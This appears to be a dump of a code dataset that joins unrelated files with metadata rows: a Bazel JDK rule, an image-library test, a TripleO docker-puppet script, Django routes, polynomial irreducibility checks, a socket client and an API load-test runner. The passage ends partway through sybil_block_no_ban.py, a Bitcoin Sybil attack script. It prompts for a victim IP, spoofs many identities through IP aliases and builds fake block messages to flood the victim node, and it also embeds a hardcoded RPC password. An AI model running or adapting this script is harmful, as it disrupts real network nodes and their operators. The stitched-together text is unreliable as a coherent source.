"java_home": attr.string(),
"version": attr.string(),
"build_file": attr.label(),
},
)
def local_java_repository(name, java_home, version = "", build_file = None):
"""Registers a runtime toolchain for local JDK and creates an unregistered compile toolchain.
Toolchain resolution is constrained with --java_runtime_version flag
having value of the "name" or "version" parameter.
Java compile toolchains are created for --java_language_version flags values
between 8 and version (inclusive). Java compile toolchains use the same
(local) JDK for compilation.
If there is no JDK "virtual" targets are created, which fail only when actually needed.
Args:
name: A unique name for this rule.
java_home: Location of the JDK imported.
      version: optional Java version
      build_file: optional BUILD file template
"""
_local_java_repository_rule(name = name, java_home = java_home, version = version, build_file = build_file)
native.register_toolchains("@" + name + "//:runtime_toolchain_definition")
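# Example WORKSPACE usage (a minimal sketch; the repository name, path and
# version below are hypothetical):
#
#   load("@bazel_tools//tools/jdk:local_java_repository.bzl", "local_java_repository")
#
#   local_java_repository(
#       name = "my_jdk",
#       java_home = "/usr/lib/jvm/java-11-openjdk",
#       version = "11",
#   )
#
# Builds can then select this runtime with --java_runtime_version=my_jdk
# (or, via the version setting, --java_runtime_version=11).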
| 37.626609 | 130 | 0.666705 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,553 | 0.519334 |
4c131d63691e04e79320d304f39d4fe881bda148 | 1,850 | py | Python | site-packages/skimage/io/tests/test_io.py | oz90210/Pyto | 59f185149b71e57e5debeb1c9a61a28739e81720 | [
"MIT"
] | null | null | null | site-packages/skimage/io/tests/test_io.py | oz90210/Pyto | 59f185149b71e57e5debeb1c9a61a28739e81720 | [
"MIT"
] | 1 | 2020-04-25T20:36:07.000Z | 2020-04-25T20:36:07.000Z | site-packages/skimage/io/tests/test_io.py | Wristlebane/Pyto | 901ac307b68486d8289105c159ca702318bea5b0 | [
"MIT"
] | null | null | null | import os
import numpy as np
from skimage import io, data_dir
from skimage._shared import testing
from skimage._shared.testing import assert_array_equal
one_by_one_jpeg = (
b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01'
b'\x00\x01\x00\x00\xff\xdb\x00C\x00\x03\x02\x02\x02\x02'
b'\x02\x03\x02\x02\x02\x03\x03\x03\x03\x04\x06\x04\x04'
b'\x04\x04\x04\x08\x06\x06\x05\x06\t\x08\n\n\t\x08\t\t'
b'\n\x0c\x0f\x0c\n\x0b\x0e\x0b\t\t\r\x11\r\x0e\x0f\x10'
b'\x10\x11\x10\n\x0c\x12\x13\x12\x10\x13\x0f\x10\x10'
b'\x10\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11'
b'\x00\xff\xc4\x00\x14\x00\x01\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\xff\xc4\x00'
b'\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\xff\xda\x00\x08\x01\x01\x00'
b'\x00?\x00*\x9f\xff\xd9'
)
def test_stack_basic():
x = np.arange(12).reshape(3, 4)
io.push(x)
assert_array_equal(io.pop(), x)
def test_stack_non_array():
with testing.raises(ValueError):
io.push([[1, 2, 3]])
def test_imread_file_url():
# tweak data path so that file URI works on both unix and windows.
data_path = data_dir.lstrip(os.path.sep)
data_path = data_path.replace(os.path.sep, '/')
image_url = 'file:///{0}/camera.png'.format(data_path)
image = io.imread(image_url)
assert image.shape == (512, 512)
def test_imread_http_url(httpserver):
# httpserver is a fixture provided by pytest-localserver
# https://bitbucket.org/pytest-dev/pytest-localserver/
httpserver.serve_content(one_by_one_jpeg)
# it will serve anything you provide to it on its url.
# we add a /test.jpg so that we can identify the content
# by extension
image = io.imread(httpserver.url + '/test.jpg' + '?' + 's' * 266)
assert image.shape == (1, 1)
| 33.636364 | 70 | 0.677838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 971 | 0.524865 |
4c193e499f0f1632e4dcf16c607003de7e5c3eaa | 14,091 | py | Python | docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 368b3eadda577f9914d181893df2df96367e8fad | [
"Apache-2.0"
] | null | null | null | docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 368b3eadda577f9914d181893df2df96367e8fad | [
"Apache-2.0"
] | null | null | null | docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 368b3eadda577f9914d181893df2df96367e8fad | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Shell script tool to run puppet inside of the given docker container image.
# Uses the config file at /var/lib/docker-puppet/docker-puppet.json as a source for a JSON
# array of [config_volume, puppet_tags, manifest, config_image, [volumes]] settings
# that can be used to generate config files or run ad-hoc puppet modules
# inside of a container.
import glob
import json
import logging
import os
import sys
import subprocess
import sys
import tempfile
import multiprocessing
log = logging.getLogger()
ch = logging.StreamHandler(sys.stdout)
if os.environ.get('DEBUG', False):
log.setLevel(logging.DEBUG)
ch.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
# this is to match what we do in deployed-server
def short_hostname():
subproc = subprocess.Popen(['hostname', '-s'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
return cmd_stdout.rstrip()
def pull_image(name):
log.info('Pulling image: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'pull', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
def match_config_volume(prefix, config):
# Match the mounted config volume - we can't just use the
# key as e.g "novacomute" consumes config-data/nova
volumes = config.get('volumes', [])
    config_volume = None
for v in volumes:
if v.startswith(prefix):
config_volume = os.path.relpath(
v.split(":")[0], prefix).split("/")[0]
break
return config_volume
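# Example (hypothetical values): with prefix "/var/lib/config-data" and a
# config whose volumes include "/var/lib/config-data/nova/etc/:/etc/:ro",
# match_config_volume() returns "nova" even if the service key is "novacompute".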
def get_config_hash(prefix, config_volume):
hashfile = os.path.join(prefix, "%s.md5sum" % config_volume)
hash_data = None
if os.path.isfile(hashfile):
with open(hashfile) as f:
hash_data = f.read().rstrip()
return hash_data
def rm_container(name):
if os.environ.get('SHOW_DIFF', None):
log.info('Diffing container: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'diff', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
log.info('Removing container: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'rm', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr and \
cmd_stderr != 'Error response from daemon: ' \
'No such container: {}\n'.format(name):
log.debug(cmd_stderr)
process_count = int(os.environ.get('PROCESS_COUNT',
multiprocessing.cpu_count()))
log.info('Running docker-puppet')
config_file = os.environ.get('CONFIG', '/var/lib/docker-puppet/docker-puppet.json')
log.debug('CONFIG: %s' % config_file)
with open(config_file) as f:
json_data = json.load(f)
# To save time we support configuring 'shared' services at the same
# time. For example configuring all of the heat services
# in a single container pass makes sense and will save some time.
# To support this we merge shared settings together here.
#
# We key off of config_volume as this should be the same for a
# given group of services. We are also now specifying the container
# in which the services should be configured. This should match
# in all instances where the volume name is also the same.
configs = {}
for service in (json_data or []):
if service is None:
continue
if isinstance(service, dict):
service = [
service.get('config_volume'),
service.get('puppet_tags'),
service.get('step_config'),
service.get('config_image'),
service.get('volumes', []),
]
config_volume = service[0] or ''
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if not manifest or not config_image:
continue
log.info('config_volume %s' % config_volume)
log.info('puppet_tags %s' % puppet_tags)
log.info('manifest %s' % manifest)
log.info('config_image %s' % config_image)
log.info('volumes %s' % volumes)
# We key off of config volume for all configs.
if config_volume in configs:
# Append puppet tags and manifest.
log.info("Existing service, appending puppet tags and manifest")
if puppet_tags:
configs[config_volume][1] = '%s,%s' % (configs[config_volume][1],
puppet_tags)
if manifest:
configs[config_volume][2] = '%s\n%s' % (configs[config_volume][2],
manifest)
if configs[config_volume][3] != config_image:
log.warn("Config containers do not match even though"
" shared volumes are the same!")
else:
log.info("Adding new service")
configs[config_volume] = service
log.info('Service compilation completed.')
def mp_puppet_config((config_volume, puppet_tags, manifest, config_image, volumes)):
log.debug('config_volume %s' % config_volume)
log.debug('puppet_tags %s' % puppet_tags)
log.debug('manifest %s' % manifest)
log.debug('config_image %s' % config_image)
log.debug('volumes %s' % volumes)
sh_script = '/var/lib/docker-puppet/docker-puppet.sh'
with open(sh_script, 'w') as script_file:
os.chmod(script_file.name, 0755)
script_file.write("""#!/bin/bash
set -ex
mkdir -p /etc/puppet
cp -a /tmp/puppet-etc/* /etc/puppet
rm -Rf /etc/puppet/ssl # not in use and causes permission errors
echo "{\\"step\\": $STEP}" > /etc/puppet/hieradata/docker.json
TAGS=""
if [ -n "$PUPPET_TAGS" ]; then
TAGS="--tags \"$PUPPET_TAGS\""
fi
# workaround LP1696283
mkdir -p /etc/ssh
touch /etc/ssh/ssh_known_hosts
FACTER_hostname=$HOSTNAME FACTER_uuid=docker /usr/bin/puppet apply --verbose $TAGS /etc/config.pp
# Disables archiving
if [ -z "$NO_ARCHIVE" ]; then
archivedirs=("/etc" "/root" "/var/lib/ironic/tftpboot" "/var/lib/ironic/httpboot" "/var/www")
rsync_srcs=""
for d in "${archivedirs[@]}"; do
if [ -d "$d" ]; then
rsync_srcs+=" $d"
fi
done
rsync -a -R --delay-updates --delete-after $rsync_srcs /var/lib/config-data/${NAME}
# Also make a copy of files modified during puppet run
# This is useful for debugging
mkdir -p /var/lib/config-data/puppet-generated/${NAME}
rsync -a -R -0 --delay-updates --delete-after \
--files-from=<(find $rsync_srcs -newer /etc/ssh/ssh_known_hosts -print0) \
/ /var/lib/config-data/puppet-generated/${NAME}
# Write a checksum of the config-data dir, this is used as a
# salt to trigger container restart when the config changes
tar -c -f - /var/lib/config-data/${NAME} --mtime='1970-01-01' | md5sum | awk '{print $1}' > /var/lib/config-data/${NAME}.md5sum
fi
""")
with tempfile.NamedTemporaryFile() as tmp_man:
with open(tmp_man.name, 'w') as man_file:
man_file.write('include ::tripleo::packages\n')
man_file.write(manifest)
rm_container('docker-puppet-%s' % config_volume)
pull_image(config_image)
dcmd = ['/usr/bin/docker', 'run',
'--user', 'root',
'--name', 'docker-puppet-%s' % config_volume,
'--env', 'PUPPET_TAGS=%s' % puppet_tags,
'--env', 'NAME=%s' % config_volume,
'--env', 'HOSTNAME=%s' % short_hostname(),
'--env', 'NO_ARCHIVE=%s' % os.environ.get('NO_ARCHIVE', ''),
'--env', 'STEP=%s' % os.environ.get('STEP', '6'),
'--volume', '%s:/etc/config.pp:ro' % tmp_man.name,
'--volume', '/etc/puppet/:/tmp/puppet-etc/:ro',
'--volume', '/usr/share/openstack-puppet/modules/:/usr/share/openstack-puppet/modules/:ro',
'--volume', '/var/lib/config-data/:/var/lib/config-data/:rw',
'--volume', 'tripleo_logs:/var/log/tripleo/',
# OpenSSL trusted CA injection
'--volume', '/etc/pki/ca-trust/extracted:/etc/pki/ca-trust/extracted:ro',
'--volume', '/etc/pki/tls/certs/ca-bundle.crt:/etc/pki/tls/certs/ca-bundle.crt:ro',
'--volume', '/etc/pki/tls/certs/ca-bundle.trust.crt:/etc/pki/tls/certs/ca-bundle.trust.crt:ro',
'--volume', '/etc/pki/tls/cert.pem:/etc/pki/tls/cert.pem:ro',
# script injection
'--volume', '%s:%s:rw' % (sh_script, sh_script) ]
for volume in volumes:
if volume:
dcmd.extend(['--volume', volume])
dcmd.extend(['--entrypoint', sh_script])
env = {}
# NOTE(flaper87): Always copy the DOCKER_* environment variables as
# they contain the access data for the docker daemon.
for k in filter(lambda k: k.startswith('DOCKER'), os.environ.keys()):
env[k] = os.environ.get(k)
if os.environ.get('NET_HOST', 'false') == 'true':
log.debug('NET_HOST enabled')
dcmd.extend(['--net', 'host', '--volume',
'/etc/hosts:/etc/hosts:ro'])
dcmd.append(config_image)
log.debug('Running docker command: %s' % ' '.join(dcmd))
subproc = subprocess.Popen(dcmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, env=env)
cmd_stdout, cmd_stderr = subproc.communicate()
if subproc.returncode != 0:
log.error('Failed running docker-puppet.py for %s' % config_volume)
if cmd_stdout:
log.error(cmd_stdout)
if cmd_stderr:
log.error(cmd_stderr)
else:
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
# only delete successful runs, for debugging
rm_container('docker-puppet-%s' % config_volume)
return subproc.returncode
# Holds all the information for each process to consume.
# Instead of starting them all linearly we run them using a process
# pool. This creates a list of arguments for the above function
# to consume.
process_map = []
for config_volume in configs:
service = configs[config_volume]
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if puppet_tags:
puppet_tags = "file,file_line,concat,augeas,%s" % puppet_tags
else:
puppet_tags = "file,file_line,concat,augeas"
process_map.append([config_volume, puppet_tags, manifest, config_image, volumes])
for p in process_map:
log.debug('- %s' % p)
# Fire off processes to perform each configuration. Defaults
# to the number of CPUs on the system.
p = multiprocessing.Pool(process_count)
returncodes = list(p.map(mp_puppet_config, process_map))
config_volumes = [pm[0] for pm in process_map]
success = True
for returncode, config_volume in zip(returncodes, config_volumes):
if returncode != 0:
log.error('ERROR configuring %s' % config_volume)
success = False
# Update the startup configs with the config hash we generated above
config_volume_prefix = os.environ.get('CONFIG_VOLUME_PREFIX', '/var/lib/config-data')
log.debug('CONFIG_VOLUME_PREFIX: %s' % config_volume_prefix)
startup_configs = os.environ.get('STARTUP_CONFIG_PATTERN', '/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
log.debug('STARTUP_CONFIG_PATTERN: %s' % startup_configs)
infiles = glob.glob('/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
for infile in infiles:
with open(infile) as f:
infile_data = json.load(f)
for k, v in infile_data.iteritems():
config_volume = match_config_volume(config_volume_prefix, v)
if config_volume:
config_hash = get_config_hash(config_volume_prefix, config_volume)
if config_hash:
env = v.get('environment', [])
env.append("TRIPLEO_CONFIG_HASH=%s" % config_hash)
log.debug("Updating config hash for %s, config_volume=%s hash=%s" % (k, config_volume, config_hash))
infile_data[k]['environment'] = env
outfile = os.path.join(os.path.dirname(infile), "hashed-" + os.path.basename(infile))
with open(outfile, 'w') as out_f:
json.dump(infile_data, out_f)
if not success:
sys.exit(1)
| 39.581461 | 139 | 0.613299 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,330 | 0.449223 |
4c237eab0c099d5c3321cd95e513399431effe30 | 668 | py | Python | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | null | null | null | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | null | null | null | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | 4 | 2020-05-27T10:02:31.000Z | 2021-07-11T08:14:20.000Z | from django.urls import path
from . import views
urlpatterns = [
path('apply/', views.FillPassApplication, name='transit-pass-application-form'),
path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'),
path('view-application-list/', views.DisplayApplicationList, name='view-application-list'),
path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'),
path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'),
path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'),
] | 39.294118 | 117 | 0.754491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 302 | 0.452096 |
4c308137f6fcaffcc096aaa674f08780ed2a8ef7 | 3,606 | py | Python | additions/irreducible_check.py | kluhan/seraphim | 412b693effb15f80d348d6d885d7c781774bb8aa | [
"MIT"
] | null | null | null | additions/irreducible_check.py | kluhan/seraphim | 412b693effb15f80d348d6d885d7c781774bb8aa | [
"MIT"
] | null | null | null | additions/irreducible_check.py | kluhan/seraphim | 412b693effb15f80d348d6d885d7c781774bb8aa | [
"MIT"
] | null | null | null | """
Irreducibility criteria
Implemented are the Eisenstein and the Perron criterion
Sources:
https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
Polynomials of type Polynomial are passed in, not raw lists of coefficients
"""
import logging
import helper
import itertools
def factor(n):
    # Factorization of a number n (all divisors)
i = 0
factors = []
for i in range(1, n + 1):
if n % i == 0:
factors.append(i)
return factors
def prime_factor(n):
    # Prime factorization of a number n
i = 2
factors = []
while i * i <= n:
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
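# Illustrative examples: factor(12) -> [1, 2, 3, 4, 6, 12],
# prime_factor(12) -> [2, 2, 3]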
# recursive implementation of HCF (greatest common divisor)
def hcf(x, y):
"""Highest common factor"""
if y == 0:
return x
else:
return hcf(y, x % y)
def is_polynomial_coprime(polynomial):
"""Überprüft, ob ein Polynom teilerfremd (coprime) ist"""
non_zero_polynomial = [
i for i in polynomial.coefficients if i != 0
    ]  # zeros would distort the result of HCF
if polynomial.degree() == 0:
return True
for x, y in itertools.combinations(non_zero_polynomial, 2):
if hcf(x, y) != 1:
return False
return True
# Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
def is_irreducible_perron(polynomial):
"""
    Checks a polynomial for irreducibility (Perron).
    A leading coefficient != 1 does not work.
    No statement is possible if the second-to-last coefficient is smaller than the absolute sum of the remaining coefficients
"""
if polynomial.degree() < 0:
return logging.error("Polynom ungültig")
const_coefficient = polynomial.coefficients[0]
if const_coefficient == 0:
return 0
lead_coefficient = polynomial.coefficients[polynomial.degree()]
assert lead_coefficient == 1
nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1])
total = 1
i = 0
for coeff in polynomial.coefficients:
if i < polynomial.degree() - 1:
total += abs(coeff)
i = i + 1
if nm1_coefficient > total:
return 1
return 2
# Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf
# http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
def is_irreducible_eisenstein(polynomial):
"""
    An implementation of the Eisenstein criterion.
"""
    # The polynomial must have degree m >= 1
if polynomial.degree() < 1:
return 2
    # Eisenstein requires coprime coefficients
    if helper.is_polynomial_coprime(polynomial) is False:
return 2
    # Check whether there is a prime that divides all coefficients of the polynomial up to degree m - 1. p^2 must not divide a0
const_coeff = polynomial.coefficients[0]
if const_coeff == 0:
return 0
    # Get the prime factorization of the constant term to obtain a base set of primes
prime_factors = helper.prime_factor(const_coeff)
for p in prime_factors:
        if (
            const_coeff % pow(p, 2) == 0
        ):  # if p^2 divides the constant coefficient, no statement can be made
            return 2
    for coeff in polynomial.coefficients[0 : polynomial.degree()]:
        if coeff % p != 0:
            return 2  # if the prime does not divide the coefficient, no statement can be made
return 1
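# Usage sketch (assumes the external Polynomial type used above, with
# .coefficients ordered from the constant term upward and a .degree() method):
#
#   poly = Polynomial([2, 2, 1])      # x^2 + 2x + 2, Eisenstein-irreducible for p = 2
#   is_irreducible_eisenstein(poly)   # -> 1 (irreducible); 2 means "no statement"
#   is_irreducible_perron(poly)       # -> 0/1/2 as documented above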
| 27.112782 | 121 | 0.646977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,549 | 0.428137 |
4c353955c991e91d2a8ac820fc6be7fa23bb7348 | 716 | py | Python | tools/client.py | Alisa1114/yolov4-pytorch-1 | 5dd8768f2eef868c9ee4588818350d4e1b50b98f | [
"MIT"
] | null | null | null | tools/client.py | Alisa1114/yolov4-pytorch-1 | 5dd8768f2eef868c9ee4588818350d4e1b50b98f | [
"MIT"
] | null | null | null | tools/client.py | Alisa1114/yolov4-pytorch-1 | 5dd8768f2eef868c9ee4588818350d4e1b50b98f | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
from socket import *
def client():
	# Lab computer
# serverip='120.126.151.182'
# serverport=8887
	# Testing on my own computer
serverip='127.0.0.1'
serverport=8888
client=socket(AF_INET,SOCK_STREAM)
client.connect((serverip,serverport))
address_file = open('tools/address.txt', 'r')
address = address_file.read()
client.send(address.encode())
print(client.recv(1024).decode())
if __name__=='__main__':
client()
# buffer='POST /post HTTP/1.1\r\n'
# buffer+='Content-Type:application/json\r\n'
# buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n'
# buffer+='Address : ' + address + '\r\n'
# buffer+='\r\n'
# print(buffer)
# message = "國立台北大學世界第一:)" | 25.571429 | 64 | 0.624302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 410 | 0.539474 |
4c3723af9b53c7e19a14d4d5a300a57c775f6c8c | 553 | py | Python | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | """Utiltiy functions for working with Myo Armband data."""
from setuptools import setup, find_packages
setup(name='myo_helper',
version='0.1',
      description='Utility functions for working with Myo Armband data',
author='Lif3line',
author_email='adamhartwell2@gmail.com',
license='MIT',
packages=find_packages(),
url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo
install_requires=[
'scipy',
'sklearn',
'numpy'
],
keywords='myo emg')
| 27.65 | 85 | 0.631103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 272 | 0.491863 |
4c3ccdaafeb79fdce0197fde1a5c4f83054573ab | 3,338 | py | Python | a2t/src/a2t.py | syeda-khurrath/fabric8-analytics-common | 421f7e27869c5695ed73b51e6422e097aba00108 | [
"Apache-2.0"
] | null | null | null | a2t/src/a2t.py | syeda-khurrath/fabric8-analytics-common | 421f7e27869c5695ed73b51e6422e097aba00108 | [
"Apache-2.0"
] | 4 | 2019-05-20T08:27:47.000Z | 2019-05-20T08:29:57.000Z | a2t/src/a2t.py | codeready-analytics/fabric8-analytics-common | a763c5534d601f2f40a0f02c02914c49ea23669d | [
"Apache-2.0"
] | 1 | 2020-10-05T21:12:44.000Z | 2020-10-05T21:12:44.000Z | """The main module of the Analytics API Load Tests tool.
Copyright (c) 2019 Red Hat Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
from time import time
from fastlog import log
from csv_reader import read_csv_as_dicts
from setup import setup
from cliargs import cli_parser
from component_analysis import ComponentAnalysis
from stack_analysis import StackAnalysis
from test_runner import start_tests
# current version of this tool
VERSION_MAJOR = 1
VERSION_MINOR = 0
def check_api_endpoint(api):
"""Check that some API endpoint is callable."""
log.info("Checking: core API endpoint")
with log.indent():
if not api.is_api_running():
log.error("Fatal: tested system is not available")
sys.exit(1)
else:
log.success("ok")
def check_auth_token(api):
"""Check the authorization token for the core API."""
log.info("Checking: authorization token for the core API")
with log.indent():
if api.check_auth_token_validity():
log.success("ok")
else:
log.error("Fatal: wrong token(?)")
sys.exit(1)
def check_system(api):
"""Check if all system endpoints are available and that tokens are valid."""
# try to access system endpoints
log.info("System check")
with log.indent():
check_api_endpoint(api)
check_auth_token(api)
def show_version():
"""Show A2T version."""
print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR))
def main():
"""Entry point to the Analytics API Load Tests."""
log.setLevel(log.INFO)
cli_arguments = cli_parser.parse_args()
if cli_arguments.version:
show_version()
sys.exit(0)
else:
cfg = setup(cli_arguments)
coreapi_url = os.environ.get('F8A_SERVER_API_URL', None)
component_analysis = ComponentAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
stack_analysis = StackAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
check_system(component_analysis)
try:
tests = read_csv_as_dicts(cfg["input_file"])
except Exception as e:
log.error("Test description can not be read")
log.error(e)
sys.exit(0)
t1 = time()
tags = cfg["tags"]
start_tests(cfg, tests, tags, component_analysis, stack_analysis)
t2 = time()
log.info("Start time: {}".format(t1))
log.info("End time: {}".format(t2))
log.info("Duration: {}".format(t2 - t1))
if __name__ == "__main__":
# execute only if run as a script
main()
| 30.345455 | 90 | 0.65698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,418 | 0.424805 |
4c5bad7796ac5e7201e5d6fb5312abee3b503a5c | 11,522 | py | Python | tools/Networking/sybil_block_no_ban.py | simewu/bitcoin_researcher | b9fd2efdb8ae8467c5bd4b3320713a541635df16 | [
"MIT"
] | 1 | 2020-02-15T21:44:04.000Z | 2020-02-15T21:44:04.000Z | tools/Networking/sybil_block_no_ban.py | SimeoW/bitcoin | 3644405f06c8b16a437513e8c02f0f061b91be2e | [
"MIT"
] | null | null | null | tools/Networking/sybil_block_no_ban.py | SimeoW/bitcoin | 3644405f06c8b16a437513e8c02f0f061b91be2e | [
"MIT"
] | null | null | null | from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds before sending each block message
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
def terminal(cmd):
return os.popen(cmd).read()
# Send commands to the Bitcoin Core Console
def bitcoin(cmd):
return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read()
# Generate a random identity using the broadcast address template
def random_ip():
# By forcing the IP to be above a certain threshhold, it prevents a lot of errors
minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1
while(True):
ip = broadcast_address
old_ip = ''
while(old_ip != ip):
old_ip = ip
ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1)
# Don't accept already assigned IPs
if ip == default_gateway: continue
if ip == victim_ip: continue
if ip not in [x[0] for x in identity_address]: break
return ip
#return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}'
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
def ip_alias(ip_address):
global alias_num
print(f'Setting up IP alias {ip_address} on {network_interface}')
interface = f'{network_interface}:{alias_num}'
terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up')
alias_num += 1
return interface
# Construct a block packet using python-bitcoinlib
def block_packet_bytes():
hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32))
hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32))
nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little')
nNonce = random.getrandbits(32)
msg = CBlock(
nVersion=bitcoin_protocolversion,
hashPrevBlock=hashPrevBlock,
#hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
hashMerkleRoot=hashMerkleRoot,
